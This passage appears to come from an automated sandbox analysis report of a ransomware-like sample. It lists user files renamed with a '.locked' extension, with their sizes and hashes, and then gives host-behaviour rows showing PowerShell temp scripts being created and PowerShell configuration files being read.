SHA1: 5a9aaa9c0cda2c1ea55fc3793222caee58073e03 SHA256: 6766d7bf166446dbdbe918ea459fff3a9433db8363db4479ae067202850f4f7e SSDeep: 768:PRRAPwHjYTYkcZ9SUzjt0AcYr9jgg0M5YkYtCW62OVrdQl7dfKt/lktZCkrgB0UD:JRAI+0Z9SUl0Acugg37W5Yral7da/+JI |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\g dNFcb6FnjnR\ES3 _Gqz.xls.locked | 3.35 KB |
MD5:
66b2bf68805f0d7101005e8b627865f0
SHA1: 391f735e7c089fc3c734daeeaab915fff13b07ea SHA256: 547bab0d26d3ba2f860385eb1d44d0cb600df7c8e02f79e673581547f75c3499 SSDeep: 48:8s8HH/S48PczD8rH8av55ay74k/SbC9iXmbPiYsgZ7ljl3/xN9dnaZq6pZ7p3QuZ:ZQ/j4OgH8ax5a24TbKiX6PHDNaYoFd |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\pIzY1mQPy5z.jpg.locked | 82.54 KB |
MD5:
042a3c861ee348a5dfa94dbc3454b136
SHA1: 24d3c52a7cc0a0d4121850603eec7c18d4bd32f6 SHA256: 9effe1683a368a750d64d1d660008c636e1068eff6885b1b7bf58687c279ffb9 SSDeep: 1536:T+3oduIlJOW/lpZHNAj5mmDVWuZwh5gpbxTf6R4THBGK/OFg5Fxnqg7oFwE:T+3c3zOCAj5bD4Ewh5yZVGK/OiFxnqgW |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\cjppbfq4.bds.ps1 | 0.00 KB |
MD5:
c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b SSDeep: 3:U:U |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\ReeG4dx.mp4.locked | 29.60 KB |
MD5:
8de4d02f2c523b1ce7eebd18de2c7016
SHA1: cacb87a2c605f1f325ad56c5d896de5da847d804 SHA256: cdeb7458ba70bb3fa14c78d2e0ce8f8d28f66ec5cd0656030c1778b372eb1c79 SSDeep: 384:ybMJKbhTqJKJNW/GwnGalJ0H3Z/M3/4nPhAchOX37JvvGZNzA1ktGYiQM/5yWA:ubfJNsZnNJ0H+vEPhAJFmvt7u5tA |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\piEhyZXpexRShbLI8IsB.ppt.locked | 34.68 KB |
MD5:
b841da144fd4213b9e0ac728fe798843
SHA1: 98fc77f5461f7a28c3166fecbebf7e29dfd2342a SHA256: 12f784782bdc0e4c3ce3cf7ac0a426fc4b1710b62eba0f585f5c5845c37e1414 SSDeep: 768:y2t6kT5xVxx/P6Ck2NRBux5DHZ9LwEkuYwZTLEUsdb5rDYx:AkTbLx/PlkkRkjHZ69uPZERV/Yx |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\1HXSP\j4Ld8uBhqmuHP3KxL4h.jpg.locked | 57.54 KB |
MD5:
e1f1fe0221c1cfcb928f409e6db79e87
SHA1: c6f0e68d0facf7ac413243046213e37a5f8bd37f SHA256: af0a2159aa03f5517575221629484de106b17bdc35ff1a25b3d881a29ec468d7 SSDeep: 1536:6sV3lDwIJtGgtux3N/n31E6VupVCnTo4RN:6ClDwzIC3C60pVMkC |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\oase2cZbpA4gl9SmHw.pdf.locked | 7.25 KB |
MD5:
c3eabf9b5dfa08b09a342d6bc866d37c
SHA1: 16f9a7c0d525f102c28c893e520492e49fbf52e1 SHA256: 5fc4f3bf9d53adc966160880fb4a542e0864264030a0f22d5b400a54db0a4a01 SSDeep: 192:FJXUexRR1IoerRiJab+yhvIH/wslhmKvGnGOn/xWETx:kAeRb+yafjvGnGQWc |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\beePm3JTb4.mp3.locked | 22.21 KB |
MD5:
ab8912a86eb06083cae6317e3b8971d8
SHA1: fb7dfac6808e1a9cabbe0b88edf082a8ab0556a4 SHA256: 710abf7889d75e17f4af3d2558b3840ea06d3732e77c8e637de37bd723885e21 SSDeep: 384:Yjy4vfNSQxaI+x3/AVjB7VNv9w4dYhY+nHGQ1tfFs9qsG+D7vdQTQ:YDNuzIhB7V11dpyRFs9qsG+D7vdQTQ |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\HSrjj2x8m w.pdf.locked | 78.54 KB |
MD5:
03ad7325b0d31f269124202e8d3a5606
SHA1: bb0f2bf98312c11516ef941acb2e7a7aa6bff017 SHA256: 64498c91fcd2407ed1f6fad816b2032cceee820f664df7e22aec1ceee7d5350f SSDeep: 1536:ur31sbsLrS+1ZTEuUHB66I6ob1i7knyRu1I5+BsQYrUM+X3P/wRKVMq:u+6rSoTLUvob0knyN+GFYrwRg |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\1JpsPqnpISzxCGT8h\62huJB\tkzv55s072Owx0PobKt\1ZzY.doc.locked | 20.79 KB |
MD5:
28122dd89a9211d056b20e23d292e070
SHA1: c24e8eb8746a27c072750dd067ee28051727badd SHA256: 514797719fb7e9ebf9ea5a0c26f40c64cbba34f7e2c7a074e2ee70c3f6f53bfe SSDeep: 384:QjQnfzASpHn89Pn6kyrcG88WIZwV4fHii5g5UjqUavUL28B:2efzPnqHFgZg5Ujjx |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\A3TyfwL K9v.wav.locked | 43.89 KB |
MD5:
4c97c449393e334286fc540f24417522
SHA1: a19550814f14a37e2cdde00221696304648a385f SHA256: 2a2dab6cbf6cae35ac3eb5a5990303dfe206f464341f88a84b2ce09f9d0a5796 SSDeep: 768:IrnRsxBCzt+1t0YOcnq2cBlWVS/WyZSIY1gWF/wLOwbbACy035lorhjlMW:ucBCzMt0UlclkS/9ZSIsgWtsOwfDZ3q5 |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\MlcP9Z6qmpKKHL\0Blj4c_PVMox6Krbe.avi.locked | 56.99 KB |
MD5:
b3cf23ad41f42b260730b2a9aa0a3490
SHA1: fd59c4e1563c4fbb9201998e4a564a911386b883 SHA256: 4893c244477bb36bf80b09810064c62e4d553ab146dea729333ffbb0090ee552 SSDeep: 768:nsj5l8KCnYbtpyrSvIbZ95mCch8gJx1nmrcuELP2sEv/3/zHt82NrDgXBjd683lB:nsQYbtpuSAD5mCcmgFn1rdIxrNrZCb |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\KtMITYU44m.gif.locked | 31.75 KB |
MD5:
f441e6676b652f8e7b9e667bf2c2aa50
SHA1: 836d9428158b797fe203ad96a25408c4d34ca2f9 SHA256: b4c0ed4994a729ee7c01e6a6c3a1e252b19f3a0da8c79003184cfc2ff0822ef7 SSDeep: 768:e+D3ci+Vdid0IuZse/o7bV4AmjJCR8Gii0iVw1Nq2SSbPfon:e/i7MDEbqAmdCR7B0iVINB/b4n |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\UPd4fs3K7GADn\a9dY7b_1.mp3.locked | 63.10 KB |
MD5:
970bb9b6747a6b638cc627b7876939ed
SHA1: 3205254ced5498f8f24d9c19cef688599cec3811 SHA256: 26ab84bc4a6593645fe5b56bc8d86eab014bf969de73fbae487b88ff344824a5 SSDeep: 1536:TSc0HWSnnhVNrfMmkWwPhKDROuSPBmfy2ucStvlx:T90HnndMmkthKF7SPBmfy2iXx |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\i9n7calXH4A7M.gif.locked | 12.07 KB |
MD5:
6bb33da3cb25a78cab31567df3b4d47c
SHA1: 8216d433a2be4f93bcbff241adbc9bcce24c4644 SHA256: 7ade55ad2617dc2311d6f50e478b1e0303dea908baa8d5caf6c16973abaee771 SSDeep: 192:BtruIXDUNXJu4HAbk6I6oKOFysjwQ8WdSkVaaFonrMj1kQH56ZSFD:FTUnANI/FfoWdSrOogpei |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\WH QLGCUOwQQ63XPJG11\x_Oeu7-HEttBJy_TIi.mp3.locked | 48.39 KB |
MD5:
c278be690a545435371dd242264994a1
SHA1: da9cf2bde97a406dfdfc6f0a88570e56e48d7cd6 SHA256: 2461b9f8f3b94870875427703ab83b4a22b079e33d6d6cc6a3b5776e8b94f57e SSDeep: 1536:PZc3SGi5kPVAVJhQqlYX3ii6bcRnkZbi7+a78c:PZc3skPihhRP8+maa78c |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\l8_IUnff\r0B_UofmUsfyzx3hO.gif.locked | 76.30 KB |
MD5:
9bdbc295f386a3ef5c7d62a2f15f9d19
SHA1: 71144724187b4184fe698eabbed4bc5f6e2263c0 SHA256: 1afa3ea8a83921cc5106fe69782690ffd0a8cc510f8d3291735130025793814e SSDeep: 1536:z0cd9CgLwTsW0ysfbbkWzJzVu2muum3R0lG/Jgoje3DuO43pmvx5L0rFOja:zRd9CgLwTnmbbjzJxGuum3Sl8iH0Ea |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\7NUwE8d.gif.locked | 19.69 KB |
MD5:
f5c6df4daf15fd958addf9c94f8a91ec
SHA1: fbb3d419d02efcb44ae87d383ebe3fc52441cd3d SHA256: 5d735802a0a93bd816855c7a300ac03c3d5714aa4d200cb500b752cf6bbd1071 SSDeep: 384:DpWt9KvwHzzjfGIhJMM9H6rJL+sYhqd9l/0sNVrO4UbMyS+HfGm75gYRPY/j4H:DplvOzzSI8GaJL+sO299dUWO724H |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\OTVx6 RT5zx2uB.doc.locked | 21.99 KB |
MD5:
658d83bfc2dfebb6bd304927fc523ec6
SHA1: 277210edda17f6eb20997ac06e5b982ad9902218 SHA256: 9217121c592d7da30abf5d59084fddb75b9398d5b60f3fe7f014b1a69a68dd83 SSDeep: 384:4nK9eDNCJug0lydrmDBx9tfHhGGf505C71fOSE7VeH8Z//Kzq:n9ecg9WuBxJG8505C71Gv7VeHa/Kzq |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\xeBdZg2QrMG--2HBSRnm.mp3.locked | 78.05 KB |
MD5:
21d9ada5dfa4b311d4bab2f306131d2c
SHA1: 00236ee5f13ee3a0dc29300f61d77cc4678b438b SHA256: 6429a9cda955bf2e8a3e08414f2c98516f101c04270db21c2fe77c51a783f77b SSDeep: 1536:tN0vNw0CxUMSDaFqYJzfpJokobEMyWMhybXiYYaaGf20dyWIaMZJ:tS1wf2MSD3Yz3opQMyWMhkiYWhCyW1ML |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\8mdzr6.wav.locked | 56.57 KB |
MD5:
a853b0e983918171ddcd8490c312b3fe
SHA1: 9eb34461be999393148130928d46e644e3cb88d7 SHA256: fe1829afb56492f032638400b80ab83e3fc1d7afc511db86ade817caa65a44bd SSDeep: 768:xN4mZWihmlWZMhHpsHSNh9QZd+kl1uJb650+ysDP+ljB+KYanMp3rqaf8AHE3zpu:bZWkdZMhH6Hihtz6u+zIR8lE3NPrwL |
|
|
| C:\Users\CIiHmnxMn6Ps\Documents\9LmLjA8pk0rGO1UCb\1FC6.ppt.locked | 17.94 KB |
MD5:
723579abc33ccfe2031e546049cce8e6
SHA1: 17e414d0c9e27ac249bc221ed0e014170063d3f8 SHA256: 4406b4ff017efb44976bd8b3ed61bb5a6f67750aa50d74cea7b704ee66756912 SSDeep: 384:opp5kTaVin8u7PbgswwoDgOblB5mbhmtbRAyr4irexxZAp4LB0E8:6pdVin8sM6mgE9KEt1k2AApI8 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\SzJrWGq9Ll\_TaGTWaeVd.gif.locked | 34.52 KB |
MD5:
1a22cfbd34ea82d45bd755260c6dc275
SHA1: 47b5bd63b6de57027080746fa1535d4a331ea84f SHA256: 95ba0d6973cdde19c4dc1675aa16d48d735f2a8da328859f1da96364c37df355 SSDeep: 768:hpH+073p9O1ADsbatG/6JFUjEZabCmJveSU6OzvBmebQoH/:hU0tFLtgcvGJ2S38wesof |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\C0E9wIGvGzF-.mp3.locked | 2.22 KB |
MD5:
d82a096a1e0020af2d2648a3ee501f77
SHA1: 0d083225281e3e46ae970d8c2739040be7d1336d SHA256: 98032f4ad704df19155f6c4e3bd6cd2dcb6fcfaa5591da16827bba14e642be0e SSDeep: 48:TCj3CywSg2ifN/hlVgaxACbYAIpkiYBZBs3R+CXiLQKD99ZuCMR9:TCzCywQONZqaIpuVsHiM49ZubR9 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\T20oxXsoi.png.locked | 3.77 KB |
MD5:
dd45c3bd1d1c34588e0e6b3d69788662
SHA1: eab22d194ef69800ba66b5077682452c77ee96a1 SHA256: 223d2ee5fc6e7aa6a8357a7d47c4b2fe28d8471c921ce82aba33a75c4aa81619 SSDeep: 96:CYDQs2JUIQb24znOrCRCkWctrhzNwpbj100509:CYsUXKanOrCPWctF2p900509 |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\IU92qrGsq4.wav.locked | 42.63 KB |
MD5:
978f6ae326aa290abfc761c2800b862e
SHA1: 5cbca522bdb30a47ae6435a35d2c96505315107c SHA256: 83bfd562200b5551e7615afe9838a19ed1bba04bdf0d0ef65374e9ad90950093 SSDeep: 768:3G0xG98NEk0VfEOjd8kexXMTujHqvoSg31tc8hEtO4UQy/LB+eB:W+PQTGKalrltVYx3kLB+eB |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\pAQR6Uhb8oyXxz.mp3.locked | 17.44 KB |
MD5:
18571c888105f557a0434b45497b4d2a
SHA1: 083573c6b7f626ff4661e514f64a13cab432f6d5 SHA256: e3429afc190f2860cd7357efe6f30ca70623323b3b0ace872a59a76ffb78ec57 SSDeep: 384:mZogKlGutOPV6f0+749bTiXff4EIdWh2H/TNqzZC6s:mGjlGuC6s+74t2XngWh2HrQFC6s |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_615ec229-fe34-4253-86a5-c2d42c6c2a89 | 0.49 KB |
MD5:
9b0b869c5274d2083f77da232f6ce8f3
SHA1: 7c294200879f64785cc717ff1da951b75d887779 SHA256: 5a2d69d76fa18acb57162c0b8ea2950653356251aafd361d28341547ab7a17d8 SSDeep: 6:NTfXwi1zA+DF59fc4subhXwGVBBJpNVLt7i2Ddqmgx9fXwSgg8NVLt7i2Ddqmgxt:N7LC+DFbv1DJ7izx9/X/Oizxt |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\2QQ3yhqnFri.mp4.locked | 69.39 KB |
MD5:
5010265fcf0fd1e426508e39e01aa1b1
SHA1: ecf85e39aac7d7ac4dbcd74b01b2e4d80b770e49 SHA256: 94c870414f4d91a01a9a296571ab04df6cc0b281c0e65e3046e29d07c67937dd SSDeep: 1536:nUD+l2n98J3JRWv4hLHNkFeYDtpK0gHIrDCaWS/n2gCTVul6:nUTMA4ht6ewt3gwOaL/2PuA |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\PXy_oqq9tNpNFBr.mp4.locked | 44.89 KB |
MD5:
353a85edee0c5ca6c5603fcf219d89a1
SHA1: 88ced1318912262609d73b78b9ec3298208191fb SHA256: 4a0f1dff73bda339f56daeeabd14a02ba892e87a55e3fd1590782340006d681b SSDeep: 768:V+fH274yglakENRJnrqpEW2Xq/KCjJDCzaejIrhzTG5VNMu4EOy0/grjuOFnwuym:4fyglmLJeLiCdwae8FgkU0/gnL5wH7G |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\DEMSQUqRTksP.wav.locked | 51.10 KB |
MD5:
a05c411291a7a8bcff5611fdcc073a59
SHA1: 5f990f7b5ca705c60807b38c0162af64e466bb87 SHA256: 85138883dd9f6b48b998be1c22dbb139bb9e6e8e4a5fa0b8027c558c700d3a8b SSDeep: 1536:opyTnHH/7DfYm00AdZxez8/gQx2iknV6eB5U3hqoa9:tHHj3IZXdHknPeRqoW |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\kU8W1Obiy0WAauUs13Q.avi.locked | 78.07 KB |
MD5:
299b7ab59521cd766b7f8f128963e0a2
SHA1: 3f301281a33e1c2324d43856db9ca0a9d08b9c78 SHA256: 4ba634d09ebd9e0c0e5e7d5fbb9db97fe65a1034e3ae6dbc3908b8f7bc7e0f65 SSDeep: 1536:knfXwpUVzqoVrGJHiCJ5e4dnaNJEuswEBBkgEYvJgvX3lP+pphDWC3YLwJr5H:kPwpmOoVrGJdLdaJDswQB0Yy10phDJQe |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\H7vUBSujwcgyM4U.mp3.locked | 82.39 KB |
MD5:
7f8058795ba722ea63998e4bf2c354f6
SHA1: 139e38c48cc84f15e393289c26c5f5c436b0057b SHA256: 68691832bdb6af30d6780b48a2d6e5ac6ebf2bb8307d93ef12e5595473c3548a SSDeep: 1536:3f9kdaZ6VfZgtn+kbUjRA04FxSX4ZEaBxKokWuXTldPK6Gr9YviGUtowIRDg2HY7:3f9kwovAn+aaRA04LSX4manKlWuDTiTR |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\Et3YlzqRrM1z-73.avi.locked | 39.66 KB |
MD5:
d1e359cebf7dfdcafe3b818376eed241
SHA1: d16f8b634eb0fb4b196fdc42fe1cad0b4d786850 SHA256: c8479afcae883dda8998047b0a1be5e769e1464ff8a26a5cc1af89c09df3a647 SSDeep: 768:rWpmcLN6/U4yP1jmD1QaU5mlzdgQ+zRTuF4LNaAR/WGpMrWdR:VcpV1jmnUMzde+40AhWewWdR |
|
|
| C:\Users\CIiHmnxMn6Ps\Videos\h3GpSrpfUxX-LSW0Mv\yEr-LvE8By\YKk5TdfyLXgLxP86e\HcEp6\YmuQA0xKFmS1PQAo\wzoS7bt0.mp4.locked | 27.00 KB |
MD5:
05312c7aad1d5e6198d33f0b1890cde1
SHA1: 38f1e1c68f53291153f6123912cad1770b2f27f2 SHA256: f5c0c7d69199837b419676146753471b1bc653dc63c3a485c6000b7190c4fdd4 SSDeep: 768:vW7TfBn7QUAJUewS14Uu2K5pcJid8FSDe2:vWaDUNS1upQ2qSDe2 |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\-0HHthW\r8G2lRG5hpS1\718D_oTTeLvrUKMe.gif.locked | 85.64 KB |
MD5:
1715cecbe23fb9d54c70fea041e91506
SHA1: 5812dd9410cd06da2fbfc575f51533db09285a8d SHA256: 6e20fe110cd264378d61de2456db52f3ce0ac4a090abc422655b0706a7d19d85 SSDeep: 1536:a4tF8w7s5eK3JSf9j8OkWrT4PI38OuHM7muqhTTwkIvf/Wp0I:a0MeK3JgkWrE08OaKmuwo/1I |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\dDC9HY0gnLu5.gif.locked | 94.35 KB |
MD5:
fc81d89b4b892327e40eb2cf84a703bf
SHA1: f73506d2a7bfa8193a140dbc71f0838dd929eb88 SHA256: 89b3b701d0cd30b5c2bf84501b7d0891e7f3b55dedabec60593651b33ac31fae SSDeep: 1536:ptfVtkC6FmE8bTqQuuzJEWrnJdL9HTKJBM2kIo6V72WP6OpIVayjvr+JdYs:jkCREaTJuwJprvL9Y7ovWVCVvrXs |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\KU7C.mp3.locked | 33.05 KB |
MD5:
f784a943bfd0da308c01eeab13376967
SHA1: cf9cd53b65f059e1750524ccd39fb1dc4e72c857 SHA256: 15caa05b7f9cb24d2f8037926b38e15ebb21bff027e484b8258d4495dccee562 SSDeep: 768:rfQaC87ZOaUO3nPp+kEHb8H2Ps357OQaAAXFe+Um3d+F:rIaCGJ32HwH2Pm5i3O+Uq+F |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\IwsRH9V3WgO.png.locked | 53.27 KB |
MD5:
8240f6e892f6f22f6e001a2ce2fbb17a
SHA1: 4e6dd671daad9fa02f2249e0a32a4d200317af9c SHA256: bafd9007c650c757ff816e4d37d4ccf169d0ce150240ba0da3ea2d96c59ea3c5 SSDeep: 1536:wjMyzxve9ivpwpTxhvGbybKknhOtyCoaaluJUFuIny+yT:sxNqTnuby5OUaal8wBy+yT |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\qmFOtY5GmgYlzu-S.mp3.locked | 43.68 KB |
MD5:
65a7c44dca1da1844f484d137d2fa0ae
SHA1: adc7aafdc7250404f928285c39f3540772843882 SHA256: 1f90329a09da3fc9a369b89bf7a456113bcf57346c213f1993c4869ecb5a5ab3 SSDeep: 768:pPj24bxLfgkl4DPcO0cm8bwF7YHubn7WTaAlP5EdKmKEbIohXIL:hBbOdl08q7YHyn7ov4UITXIL |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\29WacU_ZG_W0bfhpP97\4B4ePZC2t6LAG3WB7.wav.locked | 76.24 KB |
MD5:
675ac69ac221612f7fedbcc60a5dc467
SHA1: 93ebd4a988dc7af3707312af2ac1fa99557135bf SHA256: 87c491ab9f43aba3e216b88fec8ea08e3a2749ce9b6c5bbfe4cfd8d9986b27a1 SSDeep: 1536:lwFw88F5d7iVzbgn+ZNEEMojHCgqL2XNMIyYS2rhDqscCp9FFNO6BGupiR4W3:lwFD43iVz8noblnTNMIw2rhDFc+b1o+A |
|
|
| C:\Users\CIiHmnxMn6Ps\Pictures\a8ox4-5SwJAFJja-_d\PSf2P6CeKXUxULh\f_0dPqd34U\IcmXYh5JRxcO.png.locked | 38.04 KB |
MD5:
60defd14ebc4287d4daa4671f21e3393
SHA1: a8072f50c760cf2453bc948d1f31871265d810d9 SHA256: 4477607b57e6a37e8c0f3587d1d3338960074af53ee114bfb61ea97280f2593d SSDeep: 768:2c26x40C4YvFIHgTvKssGa+8V8yzLkKDDItdb9PvT2vNJ:zA4YvWaK7Ga+8V8xkIvAv |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\TeoFlkJTTv9-\tBT3suOefKMkEZKJYDp.mp4.locked | 83.21 KB |
MD5:
d8434b7c99cb10ddaede696dbc6fad91
SHA1: 432de8451ee84d63a7d318b78c63f98e9b9f8ee1 SHA256: 8f480f1da469f0b621c9ad4e5aab8a84bfd9943a8f0132131ce24b8404da33ef SSDeep: 1536:s8N4NzNof5PTzauSTYJNkomRMt8enk5OHcPHKDAuHg0DaulIT:sq4BkI9ykomytG5AYHKzpDauS |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\fJKyMwC6KN-3QxYeJ 1U\Fs-cYCSAoYh e\1ycn0quZ.wav.locked | 14.82 KB |
MD5:
2cdaf36c02d2fd5c57141708328afef9
SHA1: 7415225a74f93bc631df9378ead22416cf95dc09 SHA256: 5ab63f37bdbc3167eb330053ed77d602fca106fc41bb2516c2f955e81946fb6b SSDeep: 384:g9PmyZZIyHyT5gxPmG+o95/TSfxt70lKX1FgCkT:gtfZCySetZXmZt4AngLT |
|
|
| C:\Users\CIiHmnxMn6Ps\Music\xOBuUPrCW\NDeIpAkMX1CfmQx5QtF.mp3.locked | 2.71 KB |
MD5:
9dce3bdbba51ed51fcc7858a7bc891cb
SHA1: e64e0bd1eb192f681cd2209c8ec1bddf153f0917 SHA256: 24a05192b4565a70fe6f10b4f065b8cd66428a652fba78d9eb5f890eecc8d958 SSDeep: 48:pQqqMunjyHz6ZJRqYwsVXbX7EhPknb7O6RQzYQcLs65UaWfIH45ZgwTWT:pXq5nj6zJQXbLEhPk/O6RtQcLs65MQOq |
|
|
| C:\Users\CIiHmnxMn6Ps\Desktop\WSBLdWYpk.mp3.locked | 38.35 KB |
MD5:
a8178cb4aef7fca6aa54774339378155
SHA1: e83347cf6a3640724430aca5c339bd64941030b3 SHA256: 6ced2bd23ce0a55976c045a104c00a02465b2276f1cf19e6ed846ca181fcd9e3 SSDeep: 768:FDjdUN80t9XEyiX6tjjjP62DEY5giRd5+NB+IANTYPCZbpmGTkulzgyMYaUXtOsF:p5UN8g9XZiXSjjP6S5DRd5+v+XNkP+ph |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 2.11 KB |
MD5:
a2e6e51481414414d4e26e07287d38e2
SHA1: 39b45aae395b3bad2d93c1d8da77b84d33527256 SHA256: b1183747708e382d8a443cd2992930c2b12e110b7d4c62f2cd8b97e59b8c5933 SSDeep: 48:yHSdSM7gCqNOX7gTHFl2dWBzyzDZBzyzOdIDEBXpBMSNEu3KJ:yil7gCjX7gTll2dWBzyzDZBzyzOdIDE8 |
|
|
| C:\Users\CIiHmnxMn6Ps\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | 1.88 KB |
MD5:
617cd4eb31b7d1b8a2dc31732ab94de8
SHA1: a41ed43574f5e1adbb56b30c6b3da24eba9d29af SHA256: 0864a4ce9bb5c053b9db83e0e16cd6e3b11b05442fbd7aa357632fc87bfa2a26 SSDeep: 48:yHSdSM7gCqNOX7gTHFl2dWBzyzDZBzyzOdIDEBXpBMw:yil7gCjX7gTll2dWBzyzDZBzyzOdIDEF |
|
|
Host Behavior
File (4920)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\cjppbfq4.bds.ps1 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Temp\y2tg4mad.4xk.psm1 | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\typesv3.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
2 | |
